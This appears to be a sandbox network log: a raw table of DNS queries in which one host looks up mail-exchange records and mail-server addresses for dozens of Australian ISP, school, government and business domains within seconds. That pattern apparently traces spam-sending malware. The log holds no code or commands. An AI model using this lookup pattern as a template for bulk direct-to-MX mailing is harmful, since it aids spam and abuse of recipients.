                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.833306074 CET8.8.8.8192.168.2.30x1cffNo error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:48.898477077 CET8.8.8.8192.168.2.30x2a3cNo error (0)phillipisland.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.080048084 CET8.8.8.8192.168.2.30xbc61No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.080048084 CET8.8.8.8192.168.2.30xbc61No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.093311071 CET8.8.8.8192.168.2.30x75abNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.093311071 CET8.8.8.8192.168.2.30x75abNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.093311071 CET8.8.8.8192.168.2.30x75abNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.336128950 CET8.8.8.8192.168.2.30x85c3No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.339735985 CET8.8.8.8192.168.2.30xc9d7No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.444618940 CET8.8.8.8192.168.2.30x922fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.444618940 CET8.8.8.8192.168.2.30x922fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.444618940 CET8.8.8.8192.168.2.30x922fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.464392900 CET8.8.8.8192.168.2.30xf9fbNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.470796108 CET8.8.8.8192.168.2.30x3823No error (0)phillipisland.net.au101.0.80.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.585283041 CET8.8.8.8192.168.2.30xd7acNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.585283041 CET8.8.8.8192.168.2.30xd7acNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.585283041 CET8.8.8.8192.168.2.30xd7acNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.653942108 CET8.8.8.8192.168.2.30x5336No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.698759079 CET8.8.8.8192.168.2.30xba85No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.698759079 CET8.8.8.8192.168.2.30xba85No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.698759079 CET8.8.8.8192.168.2.30xba85No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.747112036 CET8.8.8.8192.168.2.30x4ac5No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.885380983 CET8.8.8.8192.168.2.30x3fbServer failure (2)designacademy.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.919831991 CET8.8.8.8192.168.2.30x43e2No error (0)dfc.sa.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.959137917 CET8.8.8.8192.168.2.30xcae2No error (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.979159117 CET8.8.8.8192.168.2.30x4ed1No error (0)dfc-sa-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:49.979159117 CET8.8.8.8192.168.2.30x4ed1No error (0)dfc-sa-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.068521976 CET8.8.8.8192.168.2.30xb9cdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.068521976 CET8.8.8.8192.168.2.30xb9cdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.068521976 CET8.8.8.8192.168.2.30xb9cdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.093043089 CET8.8.8.8192.168.2.30x6d56No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.177361965 CET8.8.8.8192.168.2.30x2cd1No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.201685905 CET8.8.8.8192.168.2.30x217cNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.276592016 CET8.8.8.8192.168.2.30xbe90No error (0)mx-ctdodo.gtm.oss-core.net203.134.71.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.276592016 CET8.8.8.8192.168.2.30xbe90No error (0)mx-ctdodo.gtm.oss-core.net203.134.153.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.276640892 CET8.8.8.8192.168.2.30x69c8Name error (3)scolelwd.melb.catholic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.958906889 CET8.8.8.8192.168.2.30x3fbServer failure (2)designacademy.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.025052071 CET8.8.8.8192.168.2.30xd4abNo error (0)ihug.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.102993965 CET8.8.8.8192.168.2.30x670aNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.160518885 CET8.8.8.8192.168.2.30x9d06No error (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.197016954 CET8.8.8.8192.168.2.30xf6adNo error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.197016954 CET8.8.8.8192.168.2.30xf6adNo error (0)imcc-wa-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.310331106 CET8.8.8.8192.168.2.30x963eNo error (0)donnahay.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.312669992 CET8.8.8.8192.168.2.30xf3a7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.312669992 CET8.8.8.8192.168.2.30xf3a7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.312669992 CET8.8.8.8192.168.2.30xf3a7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.440298080 CET8.8.8.8192.168.2.30x26b8No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.451689005 CET8.8.8.8192.168.2.30xe5d7No error (0)donnahay-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.451689005 CET8.8.8.8192.168.2.30xe5d7No error (0)donnahay-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.568423033 CET8.8.8.8192.168.2.30xcf50No error (0)picknowl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.562936068 CET8.8.8.8192.168.2.30xcf50No error (0)picknowl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.569308043 CET8.8.8.8192.168.2.30x253cNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.580569029 CET8.8.8.8192.168.2.30x5054No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.580569029 CET8.8.8.8192.168.2.30x5054No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.677953005 CET8.8.8.8192.168.2.30xbbf7No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.679399967 CET8.8.8.8192.168.2.30x1f22No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.679399967 CET8.8.8.8192.168.2.30x1f22No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.679399967 CET8.8.8.8192.168.2.30x1f22No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.689913034 CET8.8.8.8192.168.2.30xe5d7No error (0)donnahay-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.689913034 CET8.8.8.8192.168.2.30xe5d7No error (0)donnahay-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.701807976 CET8.8.8.8192.168.2.30xf705No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.782290936 CET8.8.8.8192.168.2.30x90e2No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.806099892 CET8.8.8.8192.168.2.30x3788No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.851007938 CET8.8.8.8192.168.2.30x901No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.851007938 CET8.8.8.8192.168.2.30x901No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.851007938 CET8.8.8.8192.168.2.30x901No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.870027065 CET8.8.8.8192.168.2.30x9cc6No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.932383060 CET8.8.8.8192.168.2.30x4996No error (0)deakin.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.021392107 CET8.8.8.8192.168.2.30x2e2cNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.040929079 CET8.8.8.8192.168.2.30xedcfNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.094738960 CET8.8.8.8192.168.2.30x98fdNo error (0)deakin-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.094738960 CET8.8.8.8192.168.2.30x98fdNo error (0)deakin-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.144512892 CET8.8.8.8192.168.2.30xfacfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.144512892 CET8.8.8.8192.168.2.30xfacfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.144512892 CET8.8.8.8192.168.2.30xfacfNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.162873983 CET8.8.8.8192.168.2.30x368dNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.170509100 CET8.8.8.8192.168.2.30xe19bNo error (0)janellis.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.250124931 CET8.8.8.8192.168.2.30xdc55No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.250124931 CET8.8.8.8192.168.2.30xdc55No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.250124931 CET8.8.8.8192.168.2.30xdc55No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.268914938 CET8.8.8.8192.168.2.30x5c4cNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
